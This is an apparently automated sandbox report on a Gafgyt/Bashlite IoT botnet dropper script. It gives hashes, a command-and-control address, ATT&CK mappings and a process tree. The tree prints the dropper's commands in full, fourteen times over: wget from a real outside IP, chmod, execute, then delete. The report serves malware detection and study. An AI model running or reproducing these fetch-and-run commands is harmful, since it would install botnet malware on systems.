gafgyt | 97a2af59e1a0a78f21f585490d487c353ee3cf33beff6a0f0118dba33f1a39b0

Analysis

max time kernel
147s
max time network
148s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
08-01-2025 14:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

1KB
MD5

d9e7bd7c471560f8120f7cfd67218449
SHA1

638024e824acabdf51dfc1d2663ff94637062d56
SHA256

97a2af59e1a0a78f21f585490d487c353ee3cf33beff6a0f0118dba33f1a39b0
SHA512

d05370a9cc8b6caadf6aa7a71ed52dc3f6b0b2bdef67066a04ced589207a103ef04412d4e1afc7e936111bdf3e3e69e4f9ef56810dfb27d42b14f7b86032ee2a

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

89.33.192.138:65408

Signatures

Detected Gafgyt variant 14 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-3.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt
behavioral1/files/fstream-6.dat	family_gafgyt
behavioral1/files/fstream-7.dat	family_gafgyt
behavioral1/files/fstream-8.dat	family_gafgyt
behavioral1/files/fstream-9.dat	family_gafgyt
behavioral1/files/fstream-10.dat	family_gafgyt
behavioral1/files/fstream-11.dat	family_gafgyt
behavioral1/files/fstream-12.dat	family_gafgyt
behavioral1/files/fstream-13.dat	family_gafgyt
behavioral1/files/fstream-14.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1539	chmod
1506	chmod
1521	chmod
1554	chmod
1564	chmod
1527	chmod
1549	chmod
1511	chmod
1533	chmod
1516	chmod
1544	chmod
1559	chmod
1495	chmod
1501	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/ss	1496	ss
/tmp/ssb	1502	ssb
/tmp/ssc	1507	ssc
/tmp/ssd	1512	ssd
/tmp/sse	1517	sse
/tmp/ssg	1522	ssg
/tmp/ssh	1528	ssh
/tmp/ssi	1534	ssi
/tmp/ssl	1540	ssl
/tmp/ssp	1545	ssp
/tmp/sss	1550	sss
/tmp/sst	1555	sst
/tmp/ssx	1560	ssx
/tmp/ssy	1565	ssy

Reads system routing table 1 TTPs 4 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	ss
File opened for reading	/proc/net/route	ssg
File opened for reading	/proc/net/route	ssh
File opened for reading	/proc/net/route	ssi

Reads system network configuration 1 TTPs 4 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	ss
File opened for reading	/proc/net/route	ssg
File opened for reading	/proc/net/route	ssh
File opened for reading	/proc/net/route	ssi

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ssb	wget
File opened for modification	/tmp/ssh	wget
File opened for modification	/tmp/sss	wget
File opened for modification	/tmp/ssy	wget
File opened for modification	/tmp/ssc	wget
File opened for modification	/tmp/ssi	wget
File opened for modification	/tmp/ssx	wget
File opened for modification	/tmp/ss	wget
File opened for modification	/tmp/sse	wget
File opened for modification	/tmp/ssp	wget
File opened for modification	/tmp/ssd	wget
File opened for modification	/tmp/ssg	wget
File opened for modification	/tmp/ssl	wget
File opened for modification	/tmp/sst	wget

/tmp/wget.sh
/tmp/wget.sh
1⤵
PID:1482
- /usr/bin/wget
  wget http://176.119.150.11/ss
  2⤵
  - Writes file to tmp directory
  PID:1483
- /bin/chmod
  chmod +x ss
  2⤵
  - File and Directory Permissions Modification
  PID:1495
- /tmp/ss
  ./ss
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:1496
- /bin/rm
  rm -rf ss
  2⤵
  PID:1499
- /usr/bin/wget
  wget http://176.119.150.11/ssb
  2⤵
  - Writes file to tmp directory
  PID:1500
- /bin/chmod
  chmod +x ssb
  2⤵
  - File and Directory Permissions Modification
  PID:1501
- /tmp/ssb
  ./ssb
  2⤵
  - Executes dropped EXE
  PID:1502
- /bin/rm
  rm -rf ssb
  2⤵
  PID:1504
- /usr/bin/wget
  wget http://176.119.150.11/ssc
  2⤵
  - Writes file to tmp directory
  PID:1505
- /bin/chmod
  chmod +x ssc
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/ssc
  ./ssc
  2⤵
  - Executes dropped EXE
  PID:1507
- /bin/rm
  rm -rf ssc
  2⤵
  PID:1509
- /usr/bin/wget
  wget http://176.119.150.11/ssd
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/chmod
  chmod +x ssd
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/ssd
  ./ssd
  2⤵
  - Executes dropped EXE
  PID:1512
- /bin/rm
  rm -rf ssd
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://176.119.150.11/sse
  2⤵
  - Writes file to tmp directory
  PID:1515
- /bin/chmod
  chmod +x sse
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/sse
  ./sse
  2⤵
  - Executes dropped EXE
  PID:1517
- /bin/rm
  rm -rf sse
  2⤵
  PID:1519
- /usr/bin/wget
  wget http://176.119.150.11/ssg
  2⤵
  - Writes file to tmp directory
  PID:1520
- /bin/chmod
  chmod +x ssg
  2⤵
  - File and Directory Permissions Modification
  PID:1521
- /tmp/ssg
  ./ssg
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:1522
- /bin/rm
  rm -rf ssg
  2⤵
  PID:1525
- /usr/bin/wget
  wget http://176.119.150.11/ssh
  2⤵
  - Writes file to tmp directory
  PID:1526
- /bin/chmod
  chmod +x ssh
  2⤵
  - File and Directory Permissions Modification
  PID:1527
- /tmp/ssh
  ./ssh
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:1528
- /bin/rm
  rm -rf ssh
  2⤵
  PID:1531
- /usr/bin/wget
  wget http://176.119.150.11/ssi
  2⤵
  - Writes file to tmp directory
  PID:1532
- /bin/chmod
  chmod +x ssi
  2⤵
  - File and Directory Permissions Modification
  PID:1533
- /tmp/ssi
  ./ssi
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Reads system network configuration
  PID:1534
- /bin/rm
  rm -rf ssi
  2⤵
  PID:1537
- /usr/bin/wget
  wget http://176.119.150.11/ssl
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/chmod
  chmod +x ssl
  2⤵
  - File and Directory Permissions Modification
  PID:1539
- /tmp/ssl
  ./ssl
  2⤵
  - Executes dropped EXE
  PID:1540
- /bin/rm
  rm -rf ssl
  2⤵
  PID:1542
- /usr/bin/wget
  wget http://176.119.150.11/ssp
  2⤵
  - Writes file to tmp directory
  PID:1543
- /bin/chmod
  chmod +x ssp
  2⤵
  - File and Directory Permissions Modification
  PID:1544
- /tmp/ssp
  ./ssp
  2⤵
  - Executes dropped EXE
  PID:1545
- /bin/rm
  rm -rf ssp
  2⤵
  PID:1547
- /usr/bin/wget
  wget http://176.119.150.11/sss
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x sss
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/sss
  ./sss
  2⤵
  - Executes dropped EXE
  PID:1550
- /bin/rm
  rm -rf sss
  2⤵
  PID:1552
- /usr/bin/wget
  wget http://176.119.150.11/sst
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/chmod
  chmod +x sst
  2⤵
  - File and Directory Permissions Modification
  PID:1554
- /tmp/sst
  ./sst
  2⤵
  - Executes dropped EXE
  PID:1555
- /bin/rm
  rm -rf sst
  2⤵
  PID:1557
- /usr/bin/wget
  wget http://176.119.150.11/ssx
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/chmod
  chmod +x ssx
  2⤵
  - File and Directory Permissions Modification
  PID:1559
- /tmp/ssx
  ./ssx
  2⤵
  - Executes dropped EXE
  PID:1560
- /bin/rm
  rm -rf ssx
  2⤵
  PID:1562
- /usr/bin/wget
  wget http://176.119.150.11/ssy
  2⤵
  - Writes file to tmp directory
  PID:1563
- /bin/chmod
  chmod +x ssy
  2⤵
  - File and Directory Permissions Modification
  PID:1564
- /tmp/ssy
  ./ssy
  2⤵
  - Executes dropped EXE
  PID:1565
- /bin/rm
  rm -rf ssy
  2⤵
  PID:1567

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/ss

Filesize
89KB

MD5
712c5beb20b56a4ec972a2a18b19dc2e

SHA1
4071d76aed187380cde30cff29656f34a81fa00a

SHA256
dca35faaab3cf70fe024ad4e4c3de321db2f7d3167ce1542fe6df6e1fa4bdbd5

SHA512
1066ef889ba6988d2dcb193fb311965f915c9735e4a31b9a02d0cb0f6696bd7874350b868d77fe346c006d1cf7c20d940ee7190a1ec451b4ee4087b16eed8d2c

Download Submit
/tmp/ssb

Filesize
119KB

MD5
abba45ef30d3c7ecf8074138d79cffc4

SHA1
93b11318a7e8bef652cb7f367ecabbe2ea312a8d

SHA256
64c5a812e9425c9beecbc7039f52832583a800ef4814afc590325878219f3392

SHA512
b88b7215223076111ad79fe4b6e737161dbd27d526332fe5748d979dd6f3200e65c167ffb39da6754a4a0f96e2afb67a700d6c7b450679955c94aadfa9ae6057

Download Submit
/tmp/ssc

Filesize
111KB

MD5
60cd6500dcdf355680cc1ba44a90c67a

SHA1
3fef9b933f7bb0ee18acd55800bec20d29657b3f

SHA256
ba716142845e371a3fc097e60df28bc953dff1ac7974b286cc084e594dc05f3b

SHA512
a87e7772abbd2c4db8212d9f16f2949e3bc90291020e4a62e053de1e476a7e3b8b0ca8528a59501b321c8fdf25de0fd5ad8bcd1f8f587b86fd2b724a8c64b6d4

Download Submit
/tmp/ssd

Filesize
170KB

MD5
2fa5ec0fe2433b54cfbd618d4b0a62d7

SHA1
cdbb7e0a5fd50f473a6e2addbb1e761096d37c93

SHA256
0fed153cd1dfa8263026e31a249f151db920c279d93ba7a79114e73e7e461bbb

SHA512
1fc888f543021014c8bb35490eaad037c254a171648676a64fb3346857a51388b95eebbe9d996c6c45123580df6d3605d0c1ab89caf2f6c672d79e59093ef441

Download Submit
/tmp/sse

Filesize
179KB

MD5
1a3d530bebbfc026945573a1c150bb31

SHA1
ec7433620e01cc8967cf7c7bff69a322be90b03b

SHA256
03c775fcaa13b7dd27996dba9d41bfd3735b0207f0dafb187c6659f1849294a2

SHA512
17cb1886388e446a4b8a895189f615c7a7390cefd51a24b69cbbb8a76fb684c91eeca66a1ff3b527d181b13776fd3d2d12e891e7119d778bd784990b13c78eb1

Download Submit
/tmp/ssg

Filesize
94KB

MD5
6b69c19520284d3c5c6d3a7560ec5e6d

SHA1
ea0a4003e84e51fbc77bcba9fa2ae298fd0b89ac

SHA256
7b58e43a104df0bd12e0b042d39d22999a972ee69badab5c4b732cbf9e096742

SHA512
5b14a86055a6e087d81d8edec0d34bb6f6395824a288351ba9b7ad63a725a319da2588d23140ac2dea02793e6a15bc7316069af383925eec19f31f68362bc211

Download Submit
/tmp/ssh

Filesize
99KB

MD5
9e565c7d1e9d405884367b66ef78005f

SHA1
998d3bc303a4632d888048c8536129888fc6ad4c

SHA256
ab61922fcbd0e64c7a30a8f1b9b5ab75e851f4b8397c3eb5d6e08b663d4cfdfd

SHA512
50b6ceb6a047fb8a8e91b2d7c238eb148d36f066eeef602949f16e454efffae99a7c190f06a4043761feedce1f527a71b40d45156d6d265df3a5aa7c3cc48564

Download Submit
/tmp/ssi

Filesize
93KB

MD5
3f325cb38b0b140504096fcc5b9ed610

SHA1
81c1278f25fa2349c819701f76fba4df9e859ff3

SHA256
cc3fefb0368e59ed79e34f915baf0ff7b20c98b26813450f1149647915803524

SHA512
31a4ed2ec248dee99ac058b6ba40c50a0d28d4ebfb548b18192160b44af302aa45f3a13e2792316a5e155fbd7133a30b47e617d0586f2885b496eeffb54417b7

Download Submit
/tmp/ssl

Filesize
114KB

MD5
92fba3116b07c688ab6603da89c814d7

SHA1
3710b50d5885ec356255b43f9637029bf43c9c7e

SHA256
db82ba897b1d68df780b1c318d6083ab2873ece8ebf1b7613c01312871bf33f5

SHA512
ed4dc398af8fac895896ac943363cef0bfa0957e6b97f60e4cd30adcc358a0d994e422edda5bec3a8e912eaff075ba89f7290fac631f80db992340e5afc782bf

Download Submit
/tmp/ssp

Filesize
117KB

MD5
ee4ca783d066a8fbd70a6481567507bd

SHA1
e4fae6eb1282a8d5b217545624b091f9fbc647f2

SHA256
26f97cba46fe51de7c987113299feba956a16e505c38826cc1b745a015f23708

SHA512
5de51c0fd6163e0c4e57014658eea0a05f40cada761596ecb427309e3274f413b2b777ab43c389683e191b89a84b0c6917e4eb59461987b00a890beb3ec27d4a

Download Submit
/tmp/sss

Filesize
143KB

MD5
b4ffc4e1d2811e40375908ab08e155a7

SHA1
bf13de8160fdef9e37326208fec421fb94e02ab2

SHA256
a81152cb37412ed267ee30365084504ab6bcda3d8f58d9f6333f8bc1598e7b53

SHA512
f50d30243b9b1331a9a9cd3627fca1272187a204c0fe6dafbde85e182adf8052a447d6c77c9c7eb8292606aff44c6b467313bf388acb8be029a92b631aee2ac0

Download Submit
/tmp/sst

Filesize
143KB

MD5
c220cb33c6afc9cea9ebd99373d5063f

SHA1
2b889816224a36c90e6a2a6011c04452ac8566d8

SHA256
58c6804dffaad045357da26e843aab7ada903f473770edddae3e07e1e043f2fe

SHA512
9335b4b4bda6502062a5652cf815fdb0cf59d67867059e1f6c142d8dc8a27a764372cac5d5e3243450cca840c35bc14e33b23611e6824aad591c6834ba35371b

Download Submit
/tmp/ssx

Filesize
108KB

MD5
315ed0566e072c56ffd0dc7b11dde66f

SHA1
d1860306ef3318fbf29fec6992124ecf11621535

SHA256
948c4725d76972b35a06ff70f2103e42d8d7e368d2d05315547230418812d338

SHA512
4c1a7432a6f212201d03c79a54661193a3fb6162a96d423db812d32efecafefb82dd33f0e9903f25aae6ee15f0f839c055cfbe43f1442dc6c535781c00bb0b78

Download Submit
/tmp/ssy

Filesize
102KB

MD5
231be520a75d6d7e3a42b2f525abae52

SHA1
ee89dff2b1d9b2bb3c74a0249e00c5b616a2751d

SHA256
0036e69333bfe3e64540b9b03556790329da427557d7512c52e0eb62cf08a9f0

SHA512
f2932650636d5e03185b7efc298dd2cb84a4538bdb0ebe5b5e3c58ce72371ff8e91195c98b43822efae3a48c2879e0a800bf6fa88f4184c45637bd426fee43a2

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads